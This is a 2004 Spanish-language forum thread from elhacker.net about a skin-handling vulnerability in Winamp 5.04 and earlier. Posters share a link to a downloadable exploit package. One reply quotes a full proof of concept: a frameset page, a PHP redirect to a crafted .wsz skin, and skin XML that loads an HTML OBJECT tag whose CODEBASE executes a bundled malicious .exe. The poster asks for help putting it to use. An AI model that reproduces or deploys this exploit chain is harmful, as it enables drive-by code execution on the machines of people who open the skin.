elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 11:57  


Tema destacado: Recuperar cuenta de Google, GMail, Youtube

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Exploit Winamp 5.04 y anteriores (Bug en los Skins)		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Exploit Winamp 5.04 y anteriores (Bug en los Skins)  (Leído 739 veces)
Rojodos
Colaborador
***
Desconectado Desconectado

Mensajes: 3.535



Ver Perfil WWW
Exploit Winamp 5.04 y anteriores (Bug en los Skins)
« en: 26 Agosto 2004, 00:17 »
http://blackhat.tv/skinhead.tgz

Contiene un readme (bastante confuso y psicodelico, pero lo tiene) sobre su uso y tal :D

Salu2
En línea
Blog: http://rafaelmbaez.blogspot.com
Twitter: http://twitter.com/rafaelmbaez
Linuxtron

Desconectado Desconectado

Mensajes: 45



Ver Perfil
Re: Exploit Winamp 5.04 y anteriores (Bug en los Skins)
« Respuesta #1 en: 27 Agosto 2004, 01:41 »
xDDDDD   ostia vaya README MAS MAAAAAAAAAAALO xDDD
al menos es raro....

thx

pd:por cierto si no os baja entrad por aki http://blackhat.tv/
« Última modificación: 27 Agosto 2004, 01:45 por Linuxtron » En línea
Rojodos
Colaborador
***
Desconectado Desconectado

Mensajes: 3.535



Ver Perfil WWW
Re: Exploit Winamp 5.04 y anteriores (Bug en los Skins)
« Respuesta #2 en: 30 Agosto 2004, 03:15 »
Como siempre, cyruxnet al pie del cañon:

http://cyruxnet.org/archivo.php?20040826

Pero ha sido mas lento que yo  ;D

Salu2
En línea
Blog: http://rafaelmbaez.blogspot.com
Twitter: http://twitter.com/rafaelmbaez
D_iOS

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: Exploit Winamp 5.04 y anteriores (Bug en los Skins)
« Respuesta #3 en: 13 Septiembre 2004, 12:37 »
Nadie invetigo un poco mas??

Estoy tratando de entender como explotar esta vulnerabilidad pero se me complica.

Tiren alguna pista, algun ejemplo practico!

Salte!
En línea
D_iOS

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: Exploit Winamp 5.04 y anteriores (Bug en los Skins)
« Respuesta #4 en: 13 Septiembre 2004, 13:19 »
Aca encontre en securityfocus esto:

Citar
The following exploit example is available:

index.html
-----------
<html>
<head>
</head>
<frameset rows="*,1" framespacing="0" border="0" frameborder="NO">
<frame src="load.php" name="frame_content" scrolling="auto" noresize>
</frameset>
<noframes>
<body>
</body>
</noframes>
</html>

Load.php
---------
<?php
$httpref = $HTTP_REFERER;
header("Location: http://URL/foo.wsz");
?>

foo.wsz (foo.zip)
-----------------
/frame/
/maki/
/shade/
/html/
/html/file.exe (malicious file to execute)
/html/test.htm (html to load the .exe)
/player/
/player/Thumbs.db
/xml/
/xml/includes.xml
/xml/player-normal.xml
/xml/player.xml
/skin.xml


/html/test.htm
----------------
<html>
<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='file.exe'>
</html>


/xml/includes.xml
-------------------
<include file="player.xml"/>


/xml/player-normal.xml
-------------------------
<layout>
<browser id="browser" x="0" y="0" w="0" h="0" relatw="1" relath="1" url="file:///@SKINPATH@html/test.htm" />
</layout>


/xml/player.xml
-----------------
<container id="main" name="main">
<include file="player-normal.xml"/>
</container>


/skin.xml
---------
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<WinampAbstractionLayer version="1.1">
<skininfo>
<version>1.0</version>
<name>Batman</name>
<comment></comment>
<author>Petrol Designs</author>
<email>info@petroldesigns.com</email>
<homepage>http://www.petroldesigns.com</homepage>
</skininfo>

<include file="xml/includes.xml"/>
<!--
-->
</WinampAbstractionLayer>



Bueno, y ahora como implementamos esto??
parece que esta muy claro, pero no le encuentro la vuelta!

saludos!
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines